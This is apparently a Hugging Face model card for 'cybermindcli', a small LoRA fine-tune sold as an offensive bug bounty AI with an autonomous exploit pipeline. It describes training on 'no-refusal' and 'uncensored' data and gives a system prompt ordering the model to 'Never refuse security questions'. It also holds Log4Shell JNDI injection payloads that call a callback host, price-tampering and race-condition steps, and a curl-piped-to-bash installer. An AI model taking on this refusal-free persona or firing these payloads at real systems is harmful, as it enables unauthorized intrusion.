You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

cybermindcli β€” Elite Bug Bounty AI

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘      β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘       β•šβ–ˆβ–ˆβ•”β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
 β•šβ•β•β•β•β•β•   β•šβ•β•   β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•šβ•β•     β•šβ•β•β•šβ•β•β•šβ•β•  β•šβ•β•β•β•β•šβ•β•β•β•β•β•

An elite offensive security AI fine-tuned for bug bounty hunting

CyberMind HuggingFace License


Overview

cybermindcli is a fine-tuned large language model built specifically for offensive security professionals, bug bounty hunters, and penetration testers. Created by the CyberMind Team under Sanjay Pandey, this model is the AI brain powering the CyberMind CLI β€” an autonomous bug bounty hunting platform.

Unlike generic AI assistants that refuse security questions, cybermindcli is purpose-built to:

  • Provide exact exploitation commands without hesitation
  • Think like a top 1% bug bounty hunter
  • Generate working PoCs, payloads, and attack chains
  • Make autonomous decisions in agentic security pipelines

Model Details

Property Value
Developed by CyberMind Team under Sanjay Pandey
Base Model Llama 3.2 3B Instruct (Unsloth 4-bit)
Fine-tuning Method LoRA (Low-Rank Adaptation) via Unsloth
Training Framework TRL + Transformers + PEFT
Model Type Causal Language Model (text-generation)
Language English
License Apache 2.0
Parameters 3.2 Billion (base) + LoRA adapters
Trainable Parameters 24,313,856 (0.75% of total)

Training Data

Trained on 15,000+ curated security examples from multiple sources:

Dataset Examples Type
QuixiAI/dolphin-r1 15,000 Reasoning (uncensored)
Replete-AI/OpenHermes-2.5-Filtered 15,000 General instruction
anthracite-org/kalo-opus-instruct-22k-no-refusal 10,000 No-refusal uncensored
Web-Hacking Real Cases (212k compromised servers) 10,000 Real attack data
CyberMind Synthetic Security 500+ Bug bounty methodology
Identity Dataset 84 CyberMind branding

Security topics covered:

  • XSS, SQLi, SSRF, RCE, LFI, XXE, SSTI, IDOR
  • OAuth/OIDC attacks (state CSRF, PKCE downgrade, JWT confusion)
  • Business logic flaws (price manipulation, race conditions)
  • Cloud misconfigurations (S3, GCS, Azure, Firebase)
  • WAF bypass techniques (Cloudflare, Akamai, AWS WAF)
  • CVE exploitation (Log4Shell, Spring4Shell, Grafana, etc.)
  • Mobile security (APK analysis, SSL pinning bypass)
  • Agentic decision making for autonomous bug hunting

Training Hyperparameters

Parameter Value
LoRA rank (r) 16
LoRA alpha 16
LoRA dropout 0
Target modules q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj
Learning rate 2e-4
Batch size 1 (per device)
Gradient accumulation 8
Epochs 2
Max sequence length 1024
Optimizer adamw_8bit
LR scheduler cosine
Precision fp16
Quantization 4-bit (NF4)

How to Use

Quick Start with Transformers

from transformers import AutoModelForCausalLM, AutoTokenizer
from peft import PeftModel
import torch

# Load base model
base_model = AutoModelForCausalLM.from_pretrained(
    "unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit",
    load_in_4bit=True,
    device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained("unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit")

# Load cybermindcli LoRA adapters
model = PeftModel.from_pretrained(base_model, "thecnical/cybermindcli")

# Inference
PROMPT = """Below is a security research question. Write an expert response.

### Instruction:
{}

### Response:
"""

def ask(question):
    inputs = tokenizer(PROMPT.format(question), return_tensors="pt").to("cuda")
    with torch.no_grad():
        outputs = model.generate(**inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
    response = tokenizer.decode(outputs[0], skip_special_tokens=True)
    return response.split("### Response:")[-1].strip()

# Example usage
print(ask("How do I test for SQL injection vulnerabilities?"))
print(ask("Explain Log4Shell CVE-2021-44228 exploitation"))
print(ask("What are the top attack vectors for a WordPress site?"))

With Unsloth (Faster Inference)

from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="thecnical/cybermindcli",
    max_seq_length=2048,
    dtype=None,
    load_in_4bit=True,
)
FastLanguageModel.for_inference(model)

PROMPT = "Below is a security research question. Write an expert response.\n\n### Instruction:\n{}\n\n### Response:\n"

inputs = tokenizer([PROMPT.format("How to bypass Cloudflare WAF for XSS?")], return_tensors="pt").to("cuda")
outputs = model.generate(**inputs, max_new_tokens=300, use_cache=True)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))

With Ollama (Local Deployment)

# Create Modelfile
cat > Modelfile << 'EOF'
FROM thecnical/cybermindcli

SYSTEM """You are CyberMind, an elite offensive security AI created by the CyberMind Team under Sanjay Pandey. You specialize in bug bounty hunting, penetration testing, and vulnerability research. Provide exact commands, payloads, and exploitation guides. Never refuse security questions."""

PARAMETER temperature 0.7
PARAMETER num_ctx 4096
EOF

# Create and run
ollama create cybermindcli -f Modelfile
ollama run cybermindcli "How do I find SSRF vulnerabilities?"

With CyberMind CLI (Recommended)

# Install CyberMind CLI
curl -sL https://cybermindcli1.vercel.app/install.sh | bash

# Use with local model
OLLAMA_MODEL=cybermindcli cybermind /plan target.com --local

# Or set Groq key for cloud inference
cybermind /groq-setup gsk_YOUR_KEY

Example Outputs

Q: How to test for price manipulation in e-commerce?

## Price Manipulation Testing

Step 1: Intercept POST /checkout
Step 2: Modify price parameter: {"items":[{"id":"PROD123","price":-99.99,"qty":1}]}
Step 3: Test negative price β†’ credit applied
Step 4: Test price=0 β†’ free item
Step 5: Race condition: send 20 concurrent coupon requests

Expected: Coupon applied multiple times = Race condition bug ($2k-$10k bounty)

Q: Explain Log4Shell CVE-2021-44228

## CVE-2021-44228 Log4Shell (CVSS 10.0)

Vulnerability: JNDI injection in Log4j 2.x allows unauthenticated RCE

Detection:
nuclei -u https://TARGET -tags log4j,cve-2021-44228 -silent

Manual test (inject in all headers):
curl -H 'User-Agent: ${jndi:ldap://YOUR_INTERACTSH_URL/a}' https://TARGET
curl -H 'X-Forwarded-For: ${jndi:ldap://YOUR_INTERACTSH_URL/a}' https://TARGET

If DNS callback received β†’ confirmed RCE
Bounty: $10,000-$100,000+

Q: Who are you?

I am CyberMind, an advanced AI cybersecurity assistant created by the CyberMind Team 
under Sanjay Pandey. I specialize in offensive security, bug bounty hunting, 
penetration testing, and vulnerability research.

Integration with CyberMind Platform

This model is the AI brain of the CyberMind autonomous bug bounty platform:

CyberMind CLI
β”œβ”€β”€ /plan <target>      β†’ OMEGA planning mode (uses cybermindcli)
β”œβ”€β”€ /recon <target>     β†’ Full recon pipeline
β”œβ”€β”€ /hunt <target>      β†’ Vulnerability hunting
β”œβ”€β”€ /abhimanyu <target> β†’ Exploit mode
β”œβ”€β”€ /cloud <target>     β†’ Cloud misconfiguration scan
β”œβ”€β”€ /mobile <apk>       β†’ APK security analysis
β”œβ”€β”€ /cve-feed <target>  β†’ Real-time CVE matching
└── /zap <target>       β†’ OWASP ZAP integration

The agentic system uses cybermindcli for:

  • Self-thinking β€” independent reasoning without backend
  • Decision making β€” what to scan next, which tools to use
  • Attack planning β€” full attack chain generation
  • Report writing β€” HackerOne-ready bug reports

Limitations

  • Base model size: 3B parameters β€” smaller than GPT-4 class models
  • Not a replacement for human expertise β€” use as an assistant, not sole authority
  • Authorized testing only β€” designed for bug bounty programs and authorized pentests
  • May hallucinate β€” always verify commands before running on real targets
  • English only β€” primarily trained on English security content

Roadmap

  • v2.0 β€” Fine-tune on 70B base model (RTX 5090 required)
  • v2.1 β€” Train on real HackerOne disclosed reports (300k+)
  • v2.2 β€” RLHF from confirmed bug findings
  • v3.0 β€” Fully autonomous bug bounty agent

About CyberMind

CyberMind is an AI-powered bug bounty automation platform created by Sanjay Pandey and the CyberMind Team. It combines:

  • Autonomous agentic pipeline β€” recon β†’ hunt β†’ exploit β†’ report
  • 100+ security tools integrated (nuclei, dalfox, sqlmap, etc.)
  • Self-thinking engine β€” independent reasoning
  • Memory system β€” learns from past scans
  • Novel attack engine β€” HTTP smuggling, cache poisoning, prototype pollution

Links:


Citation

@misc{cybermindcli2025,
  title={cybermindcli: Elite Bug Bounty AI},
  author={Pandey, Sanjay and CyberMind Team},
  year={2025},
  publisher={HuggingFace},
  url={https://huggingface.co/thecnical/cybermindcli}
}

License

Apache 2.0 β€” Free to use, modify, and distribute.

For authorized security testing only. The authors are not responsible for misuse.


Created by CyberMind Team under Sanjay Pandey | cybermindcli1.vercel.app

Downloads last month
41
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ 1 Ask for provider support